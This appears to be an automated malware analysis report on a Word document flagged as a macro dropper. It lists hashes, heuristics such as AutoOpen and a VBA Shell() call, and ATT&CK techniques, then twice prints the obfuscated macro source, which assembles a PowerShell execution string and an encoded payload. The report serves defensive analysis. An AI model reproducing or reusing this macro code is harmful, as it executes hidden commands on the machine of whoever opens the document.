Office (OLE) malware analysis — malicious · c7de9964d8f9f8fe

MALICIOUS

Office (OLE)

209.8 KB Created: 2018-06-28 12:56:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 098dcf55fefa232c0ecb7199f7acc4aa SHA-1: 372f27bd08b3532c1e761f3020501548de956ede SHA-256: c7de9964d8f9f8fe725197c0baeb773f4c99bc45a148addab8190a50291bfeda

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious OLE document containing VBA macros. A critical heuristic firing indicates the use of the Shell() function within the VBA code, which is commonly used to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6595095-0' further supports its nature as a dropper. The VBA script appears to be obfuscated, but the presence of Shell() strongly suggests it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6595095-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6595095-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10530 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10530 bytes
SHA-256: `b97b03bfd303cb18fb93373d1be0d12a34a7420971d1f66f63a4373f00200666`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "tqjItmCjm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "JUwTvpAXmB" Function hMhVcz() On Error Resume Next NIzWB = ChrB(45440 + _ Sin(PCtDBl * CLng(BfhRW + 57212) _ + 24173 _ + SdWuP)) DvnaRE _ = 5222 + Atn(12521) / 23026 / _ Round(7659) / 69976 / CInt(EkNSa) zarbBC = "HELL " + " " + " " + " " + " " + " " + " " + " ." + Chr(40) + " $s" + "hElli" + "D[1]" + Chr(43) + "$" owDGE _ = 18114 + Atn(59387) / 26831 / _ Round(59749) / 63828 / CInt(QsBCJD) SkPYC = ChrB(92621 + _ Sin(wJLpTA * CLng(IiaEp + 94093) _ + 95325 _ + VnAAXG)) ZjuwlC = "ShEllId" + "[13]" + Chr(43) + "'X'" + Chr(41) + Chr(40) + " " + Chr(34) + "$" + Chr(40) + "SE" + "t-iteM " + "'vaRIabLe" + ":oFS' " + "''" + Chr(41) + Chr(34) + Chr(43) + " [" + "strIN" + "g]" + Chr(40) + "'30Y84" + "N127S1" KAJaMc _ = 60330 + Atn(76448) / 30462 / _ Round(90801) / 14001 / CInt(HzTYL) mHObzU = ChrB(12321 + _ Sin(qOcYC * CLng(pLzKf + 87026) _ + 77357 _ + cqKJim)) mTukQaoD = "25w7<84" + "Y95N77R" + "23j85S88N" + "80%95w" + "89N78%2" + "6N116j" + "95K78w" cBOpTl _ = 96948 + Atn(43627) / 68251 / _ Round(5646) / 79202 / CInt(zlQLr) iVwAIs = ChrB(35024 + _ Sin(HfYQnl * CLng(WNNNi + 67370) _ + 76135 _ + oPHqZo)) aOCXoJjjTC = "20<109K95" + "<88R" + "121<86" + "R83K9" + "5K84" + "j78R1S30S" + "112<8" MiTQzR _ = 88188 + Atn(54722) / 85939 / _ Round(42179) / 44647 / CInt(dTwTPD) dYDzJJ = ChrB(90506 + _ Sin(HkABsE * CLng(TtwWm + 5728) _ + 55122 _ + UrLIKX)) VzhnPw = "3S81" + "R7K29N" + "82w7" + "8R78" + "R74K0S21" + "Y21%77w7" + "7w77K20K" + "67w95S78" + "j91R84%" + "85R78w82" wsnZLU _ = 16341 + Atn(63299) / 19536 / _ Round(14109) / 8850 / CInt(msrTiW) AFWsR = ChrB(94076 + _ Sin(mjGzB * CLng(GQnIOT + 86206) _ + 87828 _ + MmPhQ)) XwkTNKQ = "%95N72" + "N73j" + "78%9" + "5w76Y9" + "5K20S8" + "9N85S" + "87S21j9" + "8<73N1" hMhVcz = zarbBC + ZjuwlC + mTukQaoD + aOCXoJjjTC + VzhnPw + XwkTNKQ tcXhlv _ = 45106 + Atn(71030) / 50134 / _ Round(99641) / 42448 / CInt(KiZaMF) fVEjF = ChrB(20811 + _ Sin(Vptjdj * CLng(KtGiQQ + 80173) _ + 67880 _ + NIsriL)) End Function Function wqnEnKiWIb() On Error Resume Next laJNkU _ = 78659 + Atn(86878) / 35170 / _ Round(42931) / 13757 / CInt(hrqWmv) oSrwp = ChrB(57657 + _ Sin(pqaMTv * CLng(EHJUV + 92850) _ + 81779 _ + NQuJP)) IkfPStAn = "2R110<106" + "w77R84j" + "123%1" + "23N112S2" + "1S122" + "S82w7" + "8j78R7" + "4Y0N" + "21<21%92S" + "86<95K77K" oXmGv _ = 65516 + Atn(44466) / 35735 / _ Round(88025) / 58052 / CInt(jniwS) CLQdk = ChrB(63412 + _ Sin(QzJjF * CLng(BjOvBT + 78311) _ + 12735 _ + NmlNf)) IrFnVvVT = "95S72" + "N20m74R86" + "j21<7" + "4K79m" + "88K21m73" + "%3Y3%15K" + "15m12N8" + "7%21%1" mIMGvK _ = 83960 + Atn(96102) / 98644 / _ Round(46078) / 6800 / CInt(kpvYnN) cnVsc = ChrB(60036 + _ Sin(wdzdrW * CLng(Cirzd + 19461) _ + 31984 _ + iPXwc)) uKhnDQHUwk = "22S82S" + "78<78Y" + "74Y0Y2" + "1Y21" + "Y77w77S" + "77K20w82" + "%85K78N95" + "<86K" + "89Y9" + "1K74N83" QdpzY _ = 91118 + Atn(5664) / 23277 / _ Round(31785) / 30856 / CInt(bRMNAV) johLEb = ChrB(19127 + _ Sin(BSFGV * CLng(CYiAIi + 37074) _ + 52964 _ + qNaMCs)) znwrXmLbEj = "w78w91" + "R86m20<72" + "N79S21N" + "92m12%124" + "m120<112Y" + "126w21w12" whtrR _ = 77136 + Atn(43939) / 9787 / _ Round(47228) / 26835 / CInt(VtkGJu) YsiNs = ChrB(82151 + _ Sin(Fprzd * CLng(HKzVY + 24935) _ + 58265 _ + OBdcu)) imjALiVU = "2R82<" + "78w78j" + "74R0Y21K2" + "1<94S" + "89%2" + "0%91w87S" + "95w93Y78" + "Y20Y89S8" + "5K87%21w7" + "7K74<23j" zhNjDj _ = 12585 + Atn(56991) / 99176 / _ Round(50887) / 67827 / CInt(CiMwfH) zhKwPi = ChrB(94266 + _ Sin(uKqBk * CLng(BOXbIu + 94939) _ + 15176 _ + LWmiKA)) fpkfvmnBt = "89N85Y8" + "4%78S95" + "Y84S78Y" + "21j8" + "5m121" + "K14Y9" + "3N67N14N9" + "1Y125R118" + "m21%122<" + "82m7" + ... (truncated)

SHA-256: b97b03bfd303cb18fb93373d1be0d12a34a7420971d1f66f63a4373f00200666

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "tqjItmCjm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JUwTvpAXmB"
Function hMhVcz()
On Error Resume Next
NIzWB = ChrB(45440 + _
Sin(PCtDBl * CLng(BfhRW + 57212) _
 + 24173 _
+ SdWuP))
DvnaRE _
= 5222 + Atn(12521) / 23026 / _
Round(7659) / 69976 / CInt(EkNSa)
zarbBC = "HELL     " + "     " + "     " + "        " + "    " + "       " + "     " + "   ." + Chr(40) + " $s" + "hElli" + "D[1]" + Chr(43) + "$"
owDGE _
= 18114 + Atn(59387) / 26831 / _
Round(59749) / 63828 / CInt(QsBCJD)
SkPYC = ChrB(92621 + _
Sin(wJLpTA * CLng(IiaEp + 94093) _
 + 95325 _
+ VnAAXG))
ZjuwlC = "ShEllId" + "[13]" + Chr(43) + "'X'" + Chr(41) + Chr(40) + " " + Chr(34) + "$" + Chr(40) + "SE" + "t-iteM " + "'vaRIabLe" + ":oFS' " + "''" + Chr(41) + Chr(34) + Chr(43) + " [" + "strIN" + "g]" + Chr(40) + "'30Y84" + "N127S1"
KAJaMc _
= 60330 + Atn(76448) / 30462 / _
Round(90801) / 14001 / CInt(HzTYL)
mHObzU = ChrB(12321 + _
Sin(qOcYC * CLng(pLzKf + 87026) _
 + 77357 _
+ cqKJim))
mTukQaoD = "25w7<84" + "Y95N77R" + "23j85S88N" + "80%95w" + "89N78%2" + "6N116j" + "95K78w"
cBOpTl _
= 96948 + Atn(43627) / 68251 / _
Round(5646) / 79202 / CInt(zlQLr)
iVwAIs = ChrB(35024 + _
Sin(HfYQnl * CLng(WNNNi + 67370) _
 + 76135 _
+ oPHqZo))
aOCXoJjjTC = "20<109K95" + "<88R" + "121<86" + "R83K9" + "5K84" + "j78R1S30S" + "112<8"
MiTQzR _
= 88188 + Atn(54722) / 85939 / _
Round(42179) / 44647 / CInt(dTwTPD)
dYDzJJ = ChrB(90506 + _
Sin(HkABsE * CLng(TtwWm + 5728) _
 + 55122 _
+ UrLIKX))
VzhnPw = "3S81" + "R7K29N" + "82w7" + "8R78" + "R74K0S21" + "Y21%77w7" + "7w77K20K" + "67w95S78" + "j91R84%" + "85R78w82"
wsnZLU _
= 16341 + Atn(63299) / 19536 / _
Round(14109) / 8850 / CInt(msrTiW)
AFWsR = ChrB(94076 + _
Sin(mjGzB * CLng(GQnIOT + 86206) _
 + 87828 _
+ MmPhQ))
XwkTNKQ = "%95N72" + "N73j" + "78%9" + "5w76Y9" + "5K20S8" + "9N85S" + "87S21j9" + "8<73N1"
hMhVcz = zarbBC + ZjuwlC + mTukQaoD + aOCXoJjjTC + VzhnPw + XwkTNKQ
tcXhlv _
= 45106 + Atn(71030) / 50134 / _
Round(99641) / 42448 / CInt(KiZaMF)
fVEjF = ChrB(20811 + _
Sin(Vptjdj * CLng(KtGiQQ + 80173) _
 + 67880 _
+ NIsriL))
End Function
Function wqnEnKiWIb()
On Error Resume Next
laJNkU _
= 78659 + Atn(86878) / 35170 / _
Round(42931) / 13757 / CInt(hrqWmv)
oSrwp = ChrB(57657 + _
Sin(pqaMTv * CLng(EHJUV + 92850) _
 + 81779 _
+ NQuJP))
IkfPStAn = "2R110<106" + "w77R84j" + "123%1" + "23N112S2" + "1S122" + "S82w7" + "8j78R7" + "4Y0N" + "21<21%92S" + "86<95K77K"
oXmGv _
= 65516 + Atn(44466) / 35735 / _
Round(88025) / 58052 / CInt(jniwS)
CLQdk = ChrB(63412 + _
Sin(QzJjF * CLng(BjOvBT + 78311) _
 + 12735 _
+ NmlNf))
IrFnVvVT = "95S72" + "N20m74R86" + "j21<7" + "4K79m" + "88K21m73" + "%3Y3%15K" + "15m12N8" + "7%21%1"
mIMGvK _
= 83960 + Atn(96102) / 98644 / _
Round(46078) / 6800 / CInt(kpvYnN)
cnVsc = ChrB(60036 + _
Sin(wdzdrW * CLng(Cirzd + 19461) _
 + 31984 _
+ iPXwc))
uKhnDQHUwk = "22S82S" + "78<78Y" + "74Y0Y2" + "1Y21" + "Y77w77S" + "77K20w82" + "%85K78N95" + "<86K" + "89Y9" + "1K74N83"
QdpzY _
= 91118 + Atn(5664) / 23277 / _
Round(31785) / 30856 / CInt(bRMNAV)
johLEb = ChrB(19127 + _
Sin(BSFGV * CLng(CYiAIi + 37074) _
 + 52964 _
+ qNaMCs))
znwrXmLbEj = "w78w91" + "R86m20<72" + "N79S21N" + "92m12%124" + "m120<112Y" + "126w21w12"
whtrR _
= 77136 + Atn(43939) / 9787 / _
Round(47228) / 26835 / CInt(VtkGJu)
YsiNs = ChrB(82151 + _
Sin(Fprzd * CLng(HKzVY + 24935) _
 + 58265 _
+ OBdcu))
imjALiVU = "2R82<" + "78w78j" + "74R0Y21K2" + "1<94S" + "89%2" + "0%91w87S" + "95w93Y78" + "Y20Y89S8" + "5K87%21w7" + "7K74<23j"
zhNjDj _
= 12585 + Atn(56991) / 99176 / _
Round(50887) / 67827 / CInt(CiMwfH)
zhKwPi = ChrB(94266 + _
Sin(uKqBk * CLng(BOXbIu + 94939) _
 + 15176 _
+ LWmiKA))
fpkfvmnBt = "89N85Y8" + "4%78S95" + "Y84S78Y" + "21j8" + "5m121" + "K14Y9" + "3N67N14N9" + "1Y125R118" + "m21%122<" + "82m7" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.